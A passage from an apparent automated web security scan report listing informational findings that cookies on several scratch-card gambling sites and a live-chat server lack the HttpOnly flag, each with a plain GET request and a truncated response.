Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:46 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.170. http://scratch.co.uk/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:31 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:31 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:31 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.171. http://scratch.co.uk/help/deposit/methods/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/deposit/methods/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/deposit/methods/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:38 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:38 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:38 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:38 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 18477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.172. http://scratch.co.uk/help/fairplay/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/fairplay/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/fairplay/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:33 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:33 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:33 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:33 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.173. http://scratch.co.uk/help/privacy/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /help/privacy/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:35 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:35 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:35 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:35 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.174. http://scratch.co.uk/invite-friend/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /invite-friend/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /invite-friend/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:26 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:26 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:26 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:26 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.175. http://scratch.co.uk/over-18/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /over-18/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /over-18/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:49 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:49 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:49 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:49 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 10563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.176. http://scratch.co.uk/problem-gambling/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /problem-gambling/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:47 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.177. http://scratch.co.uk/promotions/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /promotions/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /promotions/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:22 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:22 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:22 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:22 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.178. http://scratch.co.uk/terms/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /terms/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /terms/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:47 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:47 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.179. http://scratch.co.uk/vis-club/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /vis-club/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vis-club/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:25 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:25 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:25 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:25 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.180. http://scratch.co.uk/winners/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /winners/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /winners/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:39 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:39 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:39 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:39 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 28368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.181. http://server.iad.liveperson.net/hc/15712222/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/15712222/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/15712222/?&site=15712222&cmd=mTagKnockPage&lpCallId=115274461452-278840988874&protV=20&lpjson=1&id=904552159&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scratch2cash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4711607244455630702; LivePersonID=-16101514677756-1305546140:-1:-1:-1:-1; HumanClickSiteContainerID_15712222=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1305546146164

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
Set-Cookie: HumanClickACTIVE=1305546148443; expires=Tue, 17-May-2011 11:42:28 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 11:42:28 GMT
Set-Cookie: HumanClickSiteContainerID_15712222=STANDALONE; path=/hc/15712222
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1485

lpConnLib.Process({"ResultSet": {"lpCallId":"115274461452-278840988874","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper
...[SNIP]...

12.182. http://server.iad.liveperson.net/hc/15712222/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/15712222/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/15712222/?&site=15712222&cmd=mTagKnockPage&lpCallId=148742555175-454874652903&protV=20&lpjson=1&id=2676596737&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.mundirasca.com/Home.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=7569353171659657258; path=/hc/15712222
Set-Cookie: HumanClickACTIVE=1305546107605; expires=Tue, 17-May-2011 11:41:47 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 11:41:47 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1485

lpConnLib.Process({"ResultSet": {"lpCallId":"148742555175-454874652903","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper
...[SNIP]...

12.183. http://server.iad.liveperson.net/hc/15712222/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/15712222/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/15712222/?&site=15712222&cmd=mTagStartPage&lpCallId=120615486754-137820172356&protV=20&lpjson=1&page=http%3A//www.scratchcardheaven.com/&id=636622910&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&title=Online%20Scratch%20cards%2C%20featuring%20over%2080%20flash%20Scratch%20games%20and%20scratch%20off%20tickets%20%u2013%20scratchcardheaven.com%20Scratchcards HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scratchcardheaven.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4711607244455630702; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1305546129531

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101514677756-1305546140:0; expires=Tue, 15-May-2012 11:42:20 GMT; path=/hc/15712222; domain=.liveperson.net
Set-Cookie: HumanClickKEY=4711607244455630702; path=/hc/15712222
Set-Cookie: HumanClickSiteContainerID_15712222=STANDALONE; path=/hc/15712222
Set-Cookie: LivePersonID=-16101514677756-1305546140:-1:-1:-1:-1; expires=Tue, 15-May-2012 11:42:20 GMT; path=/hc/15712222; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 11:42:20 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"120615486754-137820172356","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

12.184. http://sv.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sv.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tozxwiay5gsnm045qnofca45; path=/; HttpOnly
Set-Cookie: LanguageCode=SWE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=92AFF744A8C1ACECECBEB1CBE42B4786&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:03:33 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
